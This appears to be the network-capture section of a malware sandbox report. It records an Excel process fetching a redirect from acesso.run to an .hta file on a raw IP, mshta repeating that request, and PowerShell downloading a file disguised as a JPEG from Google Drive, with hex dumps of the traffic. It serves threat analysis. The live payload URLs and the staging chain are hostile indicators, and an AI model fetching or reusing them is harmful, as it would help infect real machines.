                                                                                                  2024-10-30 07:04:43 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                  2024-10-30 07:04:43 UTC4883INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                                                                                  Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
                                                                                                  2024-10-30 07:04:43 UTC1326INData Raw: e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db
                                                                                                  Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(
                                                                                                  2024-10-30 07:04:43 UTC1378INData Raw: 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4
                                                                                                  Data Ascii: I@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve
                                                                                                  2024-10-30 07:04:43 UTC1378INData Raw: b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da
                                                                                                  Data Ascii: cf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(
                                                                                                  2024-10-30 07:04:43 UTC1378INData Raw: 0e 51 21 52 69 af da f1 39 f6 b2 96 08 c5 98 50 be d8 58 85 a9 12 bb 31 f7 f6 c0 cc a1 66 dd e6 1f 2c f4 17 81 d1 2f 9b 09 2e a4 b0 e3 e9 8b 3a 3c 4c cd 1d 2a 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6
                                                                                                  Data Ascii: Q!Ri9PX1f,/.:<L*)XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/
                                                                                                  2024-10-30 07:04:43 UTC1378INData Raw: 1a 88 d4 12 59 54 13 5b be 27 af c8 e2 ad b4 01 4a 40 bc d0 d5 13 ac 08 c8 d1 88 d5 76 ae f9 94 33 72 c4 96 05 ae c9 e4 7e 43 e2 b0 d3 48 83 99 74 f4 7b 79 e9 ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6
                                                                                                  Data Ascii: YT['J@v3r~CHt{y2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,
                                                                                                  2024-10-30 07:04:43 UTC1378INData Raw: f0 1a af 0a 7d 3c 28 c5 9a 49 e5 7f c2 ab ba 8d 73 df 03 23 cb 74 9c 30 7b 46 1e a5 6e c7 e1 84 49 e5 8c 32 a3 6d 0c a5 58 fb 8b bc 31 d3 ba 30 66 46 a2 0d 6e 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d
                                                                                                  Data Ascii: }<(Is#t0{FnI2mX10fFn]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}
                                                                                                  2024-10-30 07:04:43 UTC1378INData Raw: cb ea 1c 74 00 05 ac 0c 9f b3 cc 90 78 d7 da 68 22 d6 ab 38 f0 89 e4 9e 58 dc c8 a1 d4 44 ad d4 72 c4 ee 2c 47 16 c2 bb 67 8a fb 55 10 93 ed ee 9b 50 24 0b 1c c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5
                                                                                                  Data Ascii: txh"8XDr,GgUP$2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De
                                                                                                  2024-10-30 07:04:43 UTC1378INData Raw: c0 1d b0 d0 a2 e9 d0 24 67 8e a4 62 b1 6a 36 30 0e 9b bb 59 ca c9 29 56 2c ad c9 e8 30 0c 1d 9a 6a 0e a2 8d 73 91 3f 98 ac a4 b2 d0 3e aa 1d 46 26 67 31 a3 3c 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74
                                                                                                  Data Ascii: $gbj60Y)V,0js?>F&g1<o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-Tt


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.2249170172.67.162.954433268C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-30 07:04:41 UTC365OUTGET /ll2rdE?&moustache=historical&spade=lonely&father HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  UA-CPU: AMD64
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                  Host: acesso.run
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-30 07:04:41 UTC1033INHTTP/1.1 302 Found
                                                                                                  Date: Wed, 30 Oct 2024 07:04:41 GMT
                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                  Content-Length: 75
                                                                                                  Connection: close
                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                  X-Download-Options: noopen
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 0
                                                                                                  Location: http://198.46.178.151/66/gb/greatthingswithmegood.hta
                                                                                                  Vary: Accept
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UMQ8YeLaqxtLwJRCl2XXIZEW2rd0H1ss3Zaetfn6BgcYTqcItWNCIrJK42ATfMPe%2BHCBNX8nDjb44nkPDOJhVD7yrsC8e%2FAgz99V%2BWfDafTz0n%2FS0I2y4yKkyBIU"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8da98d7aabf62d3e-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1356&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=947&delivery_rate=2075985&cwnd=251&unsent_bytes=0&cid=34f4d892f96339b3&ts=243&x=0"
                                                                                                  2024-10-30 07:04:41 UTC75INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 34 36 2e 31 37 38 2e 31 35 31 2f 36 36 2f 67 62 2f 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 6d 65 67 6f 6f 64 2e 68 74 61
                                                                                                  Data Ascii: Found. Redirecting to http://198.46.178.151/66/gb/greatthingswithmegood.hta


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.2249172172.67.162.95443364C:\Windows\System32\mshta.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-30 07:04:42 UTC389OUTGET /ll2rdE?&moustache=historical&spade=lonely&father HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US
                                                                                                  UA-CPU: AMD64
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                  Host: acesso.run
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-30 07:04:43 UTC1035INHTTP/1.1 302 Found
                                                                                                  Date: Wed, 30 Oct 2024 07:04:43 GMT
                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                  Content-Length: 75
                                                                                                  Connection: close
                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                  X-Download-Options: noopen
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 0
                                                                                                  Location: http://198.46.178.151/66/gb/greatthingswithmegood.hta
                                                                                                  Vary: Accept
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b9pCzzOMCd3GSTUclCPb517pGzD8fNpGVwiSDil%2BWr4tvPOyM8YPCcYK%2Fwie4cV9drfyEGzuufYAY4JGVtzVoZfMUPM0usHH4j9xWmkIh2CDQdSRd4%2BP%2Fsu6bqs%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8da98d83fa406b9b-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1223&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=971&delivery_rate=2431570&cwnd=251&unsent_bytes=0&cid=8747304d57cf6e23&ts=465&x=0"
                                                                                                  2024-10-30 07:04:43 UTC75INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 34 36 2e 31 37 38 2e 31 35 31 2f 36 36 2f 67 62 2f 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 6d 65 67 6f 6f 64 2e 68 74 61
                                                                                                  Data Ascii: Found. Redirecting to http://198.46.178.151/66/gb/greatthingswithmegood.hta


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.2249175142.250.186.464433588C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-30 07:04:56 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                                  Host: drive.google.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-30 07:04:57 UTC1319INHTTP/1.1 303 See Other
                                                                                                  Content-Type: application/binary
                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                  Date: Wed, 30 Oct 2024 07:04:57 GMT
                                                                                                  Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-_CT2CUbnoBcOyw2ht2MjYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                  Server: ESF
                                                                                                  Content-Length: 0
                                                                                                  X-XSS-Protection: 0
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.2249176172.217.16.1934433588C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-30 07:04:58 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                                  Host: drive.usercontent.google.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-30 07:05:00 UTC4906INHTTP/1.1 200 OK
                                                                                                  Content-Type: image/jpeg
                                                                                                  Content-Security-Policy: sandbox
                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 2239109
                                                                                                  Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                                  X-GUploader-UploadID: AHmUCY1ipfMuUUGps1ANp3lDyV-TJqamLJJDeYf2gPbEAE7x1Jk3g1WPGBU8D98XQOjcXTdh7bd0qI6RQw
                                                                                                  Date: Wed, 30 Oct 2024 07:05:00 GMT
                                                                                                  Expires: Wed, 30 Oct 2024 07:05:00 GMT
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  X-Goog-Hash: crc32c=WqxmdA==
                                                                                                  Server: UploadServer
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close
                                                                                                  2024-10-30 07:05:00 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                  Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                  2024-10-30 07:05:00 UTC4883INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                                                                                  Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
